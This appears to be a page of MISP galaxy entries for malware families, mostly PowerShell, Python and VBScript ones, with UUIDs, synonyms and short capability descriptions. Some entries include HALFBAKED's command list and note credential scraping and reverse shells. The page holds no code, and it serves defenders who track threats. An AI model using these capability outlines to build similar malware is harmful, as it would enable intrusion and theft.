Associated metadata

Metadata key	Value
type	[]

POWERSTAR

Internal MISP references

UUID 60e11a7b-8452-4177-b709-99ef0976c296 which can be used as unique global reference for POWERSTAR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERSTATS

POWERSTATS is a backdoor written in powershell. It has the ability to disable Microsoft Office Protected View, fingerprint the victim and receive commands.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular POWERSTATS.

Known Synonyms
`Valyria`

Internal MISP references

UUID b81d91b5-23a4-4f86-aea9-3f212169fce9 which can be used as unique global reference for POWERSTATS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERTON

Internal MISP references

UUID 08d5b8a4-e752-48f3-ac6d-944807146ce7 which can be used as unique global reference for POWERTON in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWERTRASH

This PowerShell written malware is an in-memory dropper used by FIN7 to execute the included/embedded payload. According to Mandiant's blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."

Internal MISP references

UUID ff20d720-285e-4168-ac8c-86a7f9ac18d4 which can be used as unique global reference for POWERTRASH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerWare

Internal MISP references

UUID 5c5beab9-614c-4c86-b369-086234ddb43c which can be used as unique global reference for PowerWare in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerZure

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

Internal MISP references

UUID f5fa77e9-9851-48a6-864d-e0448de062d4 which can be used as unique global reference for PowerZure in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerMagic

Internal MISP references

UUID 7ee51054-1d3b-45ec-a7fd-1e212c891b99 which can be used as unique global reference for PowerMagic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowerRAT

Internal MISP references

UUID 970bdeaf-bc34-458a-ae67-8c3578e8663d which can be used as unique global reference for PowerRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PowGoop

DLL loader that decrypts and runs a powershell-based downloader.

Internal MISP references

UUID d8429f6d-dc4b-4aae-930d-234156dbf354 which can be used as unique global reference for PowGoop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

POWRUNER

Internal MISP references

UUID 63f6df51-4de3-495a-864f-0a7e30c3b419 which can be used as unique global reference for POWRUNER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PresFox

The family is adding a fake root certificate authority, sets a proxy.pac-url for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on information shared, it seems the PowerShell script is dropped by an exploit kit.

Internal MISP references

UUID c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8 which can be used as unique global reference for PresFox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUADAGENT

Internal MISP references

UUID e27bfd65-4a58-416a-b03a-1ab1703edb24 which can be used as unique global reference for QUADAGENT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RandomQuery (Powershell)

A set of powershell scripts, using services like Google Docs and Dropbox as C2.

Internal MISP references

UUID b0a67107-dff2-4fb9-a47e-10f83779bdbb which can be used as unique global reference for RandomQuery (Powershell) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RMOT

According to Trellix, this is a first-stage, powershell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.

Internal MISP references

UUID 7e79444b-95d9-422d-92f0-aeb833a7cbcd which can be used as unique global reference for RMOT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RogueRobin

Internal MISP references

UUID 1e27a569-1899-4f6f-8c42-aa91bf0a539d which can be used as unique global reference for RogueRobin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Royal Ransom (Powershell)

Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.

Internal MISP references

UUID 1c75ffff-59f9-4fdc-958d-51f822f76c35 which can be used as unique global reference for Royal Ransom (Powershell) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Schtasks

Internal MISP references

UUID 3c627182-e4ee-4db0-9263-9d657a5d7c98 which can be used as unique global reference for Schtasks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

skyrat

Internal MISP references

UUID 8e5d7d24-9cdd-4376-a6c7-967273dfeeab which can be used as unique global reference for skyrat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sLoad.

Known Synonyms
`Starslord`

Internal MISP references

UUID e78c0259-9299-4e55-b934-17c6a3ac4bc2 which can be used as unique global reference for sLoad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Snugy

Internal MISP references

UUID 773a6520-d164-4727-8351-c4201b04f10b which can be used as unique global reference for Snugy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STEELHOOK

Internal MISP references

UUID f963e3df-13d1-4fd0-abdd-792c0d05e41c which can be used as unique global reference for STEELHOOK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SUBTLE-PAWS

Internal MISP references

UUID 399258d3-6919-45f9-a557-10c3cbef9bd4 which can be used as unique global reference for SUBTLE-PAWS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Swrort Stager

Internal MISP references

UUID 3347a1bc-6b4d-459c-98a5-746bab12d011 which can be used as unique global reference for Swrort Stager in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Tater PrivEsc

Internal MISP references

UUID 808445e6-f51c-4b5d-a812-78102bf60d24 which can be used as unique global reference for Tater PrivEsc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ThunderShell

Internal MISP references

UUID fd9904a6-6e06-4b50-8bfd-64ffb793d4a4 which can be used as unique global reference for ThunderShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified PS 001

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

Internal MISP references

UUID 77231587-0dbe-4064-97b5-d7f4a2e3dc67 which can be used as unique global reference for Unidentified PS 001 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified PS 002 (RAT)

A Powershell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.

Internal MISP references

UUID 73578ff6-b218-4271-9bda-2a567ba3e259 which can be used as unique global reference for Unidentified PS 002 (RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified PS 003 (RAT)

This malware is a RAT written in PowerShell. It has the following capabilities: Downloading and Uploading files, loading and execution of a PowerShell script, execution of a specific command. It was observed by Malwarebytes LABS Threat Intelligence Team in a newly discovered campaign: this campaigns tries to lure Germans with a promise of updates on the current threat situation in Ukraine according to Malwarebyte LABS.

Internal MISP references

UUID 709ba4ad-9ec5-4e0b-b642-96db3b7f6898 which can be used as unique global reference for Unidentified PS 003 (RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified PS 004 (RAT)

Internal MISP references

UUID a8f69576-676f-4536-b301-246ddd87ceeb which can be used as unique global reference for Unidentified PS 004 (RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ViperSoftX

Internal MISP references

UUID 15b551ea-b59a-40f9-a10f-6144415d2d5c which can be used as unique global reference for ViperSoftX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WannaMine

Internal MISP references

UUID beb4f2b3-85d1-491d-8ae1-f7933f00f820 which can be used as unique global reference for WannaMine in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WannaRen Downloader

Internal MISP references

UUID c9ef106e-def9-4229-8373-616a298ed645 which can be used as unique global reference for WannaRen Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WMImplant

Internal MISP references

UUID d1150a1a-a2f4-4954-b22a-a85b7876408e which can be used as unique global reference for WMImplant in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AndroxGh0st

According to Laceworks, this is a SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed creds and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroxGh0st.

Known Synonyms
`Androx`
`AndroxGhost`

Internal MISP references

UUID e8f24c9c-c03c-4740-a121-d73789931c8e which can be used as unique global reference for AndroxGh0st in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Archivist

Internal MISP references

UUID 2095a09c-3fdd-4164-b82e-2e9a41affd8e which can be used as unique global reference for Archivist in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ares (Python)

Ares is a Python RAT.

Internal MISP references

UUID c4a578de-bebe-49bf-8af1-407857acca95 which can be used as unique global reference for Ares (Python) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BlankGrabber

Stealer written in Python 3, typically distributed bundled via PyInstaller.

Internal MISP references

UUID c41d4749-b713-4f4c-b718-4076c0479ebc which can be used as unique global reference for BlankGrabber in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BrickerBot

Internal MISP references

UUID f0ff8751-c182-4e9c-a275-81bb03e0cdf5 which can be used as unique global reference for BrickerBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Creal Stealer

Stealer written in Python.

Internal MISP references

UUID 8a7becae-fc06-4ff1-b364-b26dd3d2edd9 which can be used as unique global reference for Creal Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DropboxC2C

Internal MISP references

UUID 53dd4a8b-374e-48b6-a7c8-58af0e31f435 which can be used as unique global reference for DropboxC2C in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Empyrean

Discord Stealer written in Python with Javascript-based inject files.

Internal MISP references

UUID b1aa0be3-b725-4135-b0b9-3a895d4ef047 which can be used as unique global reference for Empyrean in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Evil Ant

Ransomware written in Python.

Internal MISP references

UUID 24d570c6-3ed4-4346-a8b1-9fed2ed67a95 which can be used as unique global reference for Evil Ant in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Guard

According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.

Internal MISP references

UUID ac3382b3-3c18-4b16-8f1b-b371794916ac which can be used as unique global reference for Guard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

InvisibleFerret

Internal MISP references

UUID 332478a1-146f-406e-9af0-b329e478efff which can be used as unique global reference for InvisibleFerret in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KeyPlexer

Internal MISP references

UUID cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93 which can be used as unique global reference for KeyPlexer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LaZagne

The author described LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly-used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac, and Windows.

Internal MISP references

UUID c752f295-7f08-4cb0-92d5-a0c562abd08c which can be used as unique global reference for LaZagne in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Lofy

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lofy.

Known Synonyms
`LofyLife`

Internal MISP references

UUID 10882613-ac61-42da-82c8-c0f4bb2673f8 which can be used as unique global reference for Lofy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Loki RAT

This RAT written in Python is an open-source fork of the Ares RAT. This malware integrates additional modules, like recording, lockscreen, and locate options. It was used in a customized form version by El Machete APT in an ongoing champaign since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/

Internal MISP references

UUID 5e7bb9d4-6633-49f8-8770-9ac1163e6531 which can be used as unique global reference for Loki RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MASEPIE

Internal MISP references

UUID 9233f6e6-9dd7-4b30-adaa-5baf5359d22a which can be used as unique global reference for MASEPIE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

N3Cr0m0rPh

An IRC bot written in (obfuscated) Python code. Distributed in attack campaign FreakOut, written by author Freak/Fl0urite and development potentially dating back as far as 2015.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N3Cr0m0rPh.

Known Synonyms
`FreakOut`
`Necro`

Internal MISP references

UUID 2351539a-165a-4886-b5fe-f56fdf6b167a which can be used as unique global reference for N3Cr0m0rPh in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NetWorm

Internal MISP references

UUID 6c6acd00-cdc2-460d-8edf-003b84875b5d which can be used as unique global reference for NetWorm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PIRAT

Internal MISP references

UUID bca94d33-e5a1-4bcc-981e-f35fd74a79d1 which can be used as unique global reference for PIRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Poet RAT

Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered including a Python interpreter and required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.

Internal MISP references

UUID b07819a9-a2f7-454d-a520-c6424cbf1ed4 which can be used as unique global reference for Poet RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

poweRAT

Internal MISP references

UUID b5cb3d2b-0205-4883-aaff-0d0b7a7f032d which can be used as unique global reference for poweRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pupy (Python)

Internal MISP references

UUID afcc9bfc-1227-4bb0-a88a-5accdbfd58fa which can be used as unique global reference for pupy (Python) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PyAesLoader

Internal MISP references

UUID b9ba4f66-78dc-491f-8fd4-0143816ce80e which can be used as unique global reference for PyAesLoader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader - webarchive

Associated metadata

Metadata key	Value
type	[]

PyArk

Internal MISP references

UUID 01f15f4e-dd40-4246-9b99-c0d81306e37f which can be used as unique global reference for PyArk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

pyback

Internal MISP references

UUID 6d96cd1e-98f4-4784-9982-397c5df19bd9 which can be used as unique global reference for pyback in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PY#RATION

According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.

Internal MISP references

UUID 1dc471d3-6303-48a1-a17a-b4f29e5ba6a9 which can be used as unique global reference for PY#RATION in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

PyVil

PyVil RAT

Internal MISP references

UUID 2cf75f3c-116f-4faf-bd32-ba3a5e2327cf which can be used as unique global reference for PyVil in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

QUIETBOARD

Internal MISP references

UUID 6ebeed34-4a7d-44d8-ae44-83ae37cf5f2f which can be used as unique global reference for QUIETBOARD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Responder.

Known Synonyms
`SpiderLabs Responder`

Internal MISP references

UUID 3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc which can be used as unique global reference for Responder in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Saphyra

Internal MISP references

UUID 30a22cdb-9393-460b-86ae-08d97c626155 which can be used as unique global reference for Saphyra in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Serpent

According to Proofpoint, this is a backdoor written in Python, used in attacks against French entities in the construction, real estate, and government industries.

Internal MISP references

UUID 8052319b-f6da-4f53-a630-59245ff65eaf which can be used as unique global reference for Serpent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

SpaceCow

Internal MISP references

UUID ff5c0845-6740-45d5-bd34-1cf69c635356 which can be used as unique global reference for SpaceCow in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

stealler

Internal MISP references

UUID 689247a2-4e75-4802-ab94-484fc3d6a18e which can be used as unique global reference for stealler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stitch

Internal MISP references

UUID 6239201b-a0bd-4f01-8bbe-79c6fc5fa861 which can be used as unique global reference for Stitch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Stormous

Internal MISP references

UUID e2580f5e-417b-4f21-88ba-8d3e43514363 which can be used as unique global reference for Stormous in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

unidentified_002

Internal MISP references

UUID 7e5fe6ca-3323-409a-a5bb-d34f60197b99 which can be used as unique global reference for unidentified_002 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002 - webarchive

Associated metadata

Metadata key	Value
type	[]

unidentified_003

Internal MISP references

UUID 43282411-4999-4066-9b99-2e94a17acbd4 which can be used as unique global reference for unidentified_003 in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003 - webarchive

Associated metadata

Metadata key	Value
type	[]

UPSTYLE

Internal MISP references

UUID 1824c463-77df-43af-a055-d94567918f6b which can be used as unique global reference for UPSTYLE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Venomous

Ransomware written in Python and delivered as compiled executable created using PyInstaller.

Internal MISP references

UUID 0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c which can be used as unique global reference for Venomous in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Venus Stealer

Venus Stealer is a python based Infostealer observed early 2023.

Internal MISP references

UUID 20f72d3c-87b7-4349-ad1b-59d7909c1df4 which can be used as unique global reference for Venus Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VileRAT

Internal MISP references

UUID aba54ca9-ef0d-4061-93d1-65251e90afad which can be used as unique global reference for VileRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

W4SP Stealer

A basic info stealer w/ some capability to inject code into legit applications.

Internal MISP references

UUID c4d46e47-3af8-4117-84ad-1e5699956f2b which can be used as unique global reference for W4SP Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

WIREFIRE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIREFIRE.

Known Synonyms
`GIFTEDVISITOR`

Internal MISP references

UUID 54f3e853-5f0e-4940-9e27-79e6991886f9 which can be used as unique global reference for WIREFIRE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

KV

Internal MISP references

UUID 37784130-81fd-40d7-87d4-38e5085513bd which can be used as unique global reference for KV in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

xzbot

A backdoor brought into version 5.6.0 and 5.6.1 of compression library/tool xz/liblzma, which was intended to enable access via (Open)SSH on affected servers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xzbot.

Known Synonyms
`xzorcist`

Internal MISP references

UUID 293b9d76-8e58-48bc-936b-e8dfb00f6f6c which can be used as unique global reference for xzbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

FlexiSpy (symbian)

Internal MISP references

UUID 9f85f4fc-1cce-4557-b3d8-b9ef522fafb2 which can be used as unique global reference for FlexiSpy (symbian) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BASICSTAR

Internal MISP references

UUID ca86807d-5466-496a-b41f-4bde905f9064 which can be used as unique global reference for BASICSTAR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CageyChameleon

CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CageyChameleon.

Known Synonyms
`Cabbage RAT`

Internal MISP references

UUID ea71b7c1-79eb-4e9c-a670-ea75d80132f4 which can be used as unique global reference for CageyChameleon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

forbiks

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular forbiks.

Known Synonyms
`Forbix`

Internal MISP references

UUID 2ad12163-3a8e-4ece-969e-ac616303ebe1 which can be used as unique global reference for forbiks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GGLdr

Internal MISP references

UUID 8ca31b9b-6e78-4dcc-9d14-dfd97d44994e which can be used as unique global reference for GGLdr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GlowSpark

Internal MISP references

UUID ab6f8b6d-f0a0-4d2c-a81b-2dcb146914ea which can be used as unique global reference for GlowSpark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Grinju Downloader

Internal MISP references

UUID f0a64323-62a6-4c5a-bb3d-44bd3b11507f which can be used as unique global reference for Grinju Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HALFBAKED

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:

info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries processList: Send list of process running screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1) runvbs: Executes a VB script runexe: Executes EXE file runps1: Executes PowerShell script delete: Delete the specified file update: Update the specified file

Internal MISP references

UUID 095c995c-c916-488e-944d-a3f4b9842926 which can be used as unique global reference for HALFBAKED in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

HOMESTEEL

Internal MISP references

UUID 9058df01-6f7c-447e-9a68-83a41ef2f15f which can be used as unique global reference for HOMESTEEL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Iloveyou

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Iloveyou.

Known Synonyms
`Love Bug`
`LoveLetter`

Internal MISP references

UUID bba3f3c9-f65f-45f1-a482-7209b9fa5adb which can be used as unique global reference for Iloveyou in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Janicab (VBScript)

Internal MISP references

UUID b3cb5859-2049-43d3-aed2-73db45ed0112 which can be used as unique global reference for Janicab (VBScript) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

lampion

Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking clients in Portugal.

Internal MISP references

UUID 97f89048-2a57-48d5-9272-0d1061a14eca which can be used as unique global reference for lampion in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

LitterDrifter

Internal MISP references

UUID 31f64da5-e20b-4aa8-acf6-029bca10a7e6 which can be used as unique global reference for LitterDrifter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

lockscreen

Internal MISP references

UUID a583a2db-616e-48e5-b12b-088a378c2307 which can be used as unique global reference for lockscreen in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on Fireeye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID.

Internal MISP references

UUID e9afcd80-c1c6-4194-af32-133fe31e835f which can be used as unique global reference for MOUSEISLAND in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NodeJS Ransomware

Downloads NodeJS when deployed.

Internal MISP references

UUID 93c87125-7150-4bc6-a0f9-b46ff8de1839 which can be used as unique global reference for NodeJS Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

RandomQuery (VBScript)

According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.

Internal MISP references

UUID 76fd3fcb-151d-4880-b97e-ea890c337aad which can be used as unique global reference for RandomQuery (VBScript) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Starfighter (VBScript)

According to the author, this is a JavaScript based Empire launcher that runs with its own embedded powershell host to not be dependent on local powershell availability.

Internal MISP references

UUID e24b852c-3ede-42ac-8d04-68ab96bf53a0 which can be used as unique global reference for Starfighter (VBScript) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

STARWHALE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular STARWHALE.

Known Synonyms
`Canopy`
`SloughRAT`

Internal MISP references

UUID 27c70673-d40e-46a2-8f47-13cc5738ff36 which can be used as unique global reference for STARWHALE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified VBS 001

Internal MISP references

UUID ba354d45-bc41-40cd-93b2-26139db296bd which can be used as unique global reference for Unidentified VBS 001 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 002 (Operation Kremlin)

Unnamed malware. Delivered as remote template that drops a VBS file, which uses LOLBINs to crawl the disk and exfiltrate data zipped up via winrar.

Internal MISP references

UUID d8e8d701-ebe4-44ab-8c5b-70a11246ddf1 which can be used as unique global reference for Unidentified 002 (Operation Kremlin) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 003 (Gamaredon Downloader)

Internal MISP references

UUID d5955c4b-f507-4b3f-8d57-080849aba831 which can be used as unique global reference for Unidentified 003 (Gamaredon Downloader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified VBS 004 (RAT)

Lab52 describes this as a light first-stage RAT used by MuddyWater and observed samples between at least November 2020 and January 2022.

Internal MISP references

UUID 84c6b483-ba17-4a22-809d-dc37d9ce1822 which can be used as unique global reference for Unidentified VBS 004 (RAT) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified VBS 005 (Telegram Loader)

Internal MISP references

UUID 8eb8ebbc-c5b1-47d8-816a-4e21dee145c3 which can be used as unique global reference for Unidentified VBS 005 (Telegram Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified VBS 006 (Telegram Loader)

Internal MISP references

UUID a6bd28db-c1a3-44b1-8bc3-7882e2896d67 which can be used as unique global reference for Unidentified VBS 006 (Telegram Loader) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

VBREVSHELL

According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.

Internal MISP references

UUID 991179a0-efd5-450a-a1ce-78d1109bb50b which can be used as unique global reference for VBREVSHELL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

